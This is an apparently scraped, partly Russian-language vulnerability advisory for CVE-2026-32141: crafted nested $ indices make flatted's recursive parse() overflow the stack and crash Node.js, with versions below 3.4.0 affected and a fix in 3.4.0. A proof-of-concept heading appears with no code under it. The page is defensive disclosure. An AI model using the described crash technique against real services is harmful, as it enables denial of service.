GHSA-25h7-pfq9-p65f

Опубликовано: 13 мар. 2026

Источник: github

Github: Прошло ревью

CVSS3: 7.5

Описание

flatted vulnerable to unbounded recursion DoS in parse() revive phase

Summary

flatted's parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process.

Impact

Denial of Service (DoS). Any application that passes untrusted input to flatted.parse() can be crashed by an unauthenticated attacker with a single request.

flatted has ~87M weekly npm downloads and is used as the circular-JSON serialization layer in many caching and logging libraries.

Proof of Concept

Fix

The maintainer has already merged an iterative (non-recursive) implementation in PR #88, converting the recursive revive() to a stack-based loop.

Affected Versions

All versions prior to the PR #88 fix.

Ссылки

Пакеты

Наименование

flatted

npm

Затронутые версииВерсия исправления

< 3.4.0

3.4.0

EPSS

Процентиль: 3%

0.00014

Низкий

7.5 High

CVSS3

CVE ID

CVE-2026-32141

Дефекты

CWE-674

Связанные уязвимости

CVE-2026-32141

CVSS3: 7.5

ubuntu

14 дней назад

flatted is a circular JSON parser. Prior to 3.4.0, flatted's parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process. This vulnerability is fixed in 3.4.0.

CVE-2026-32141

CVSS3: 7.5

redhat

14 дней назад

A denial of service flaw has been discovered in the flatted npm library. flatted's parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process.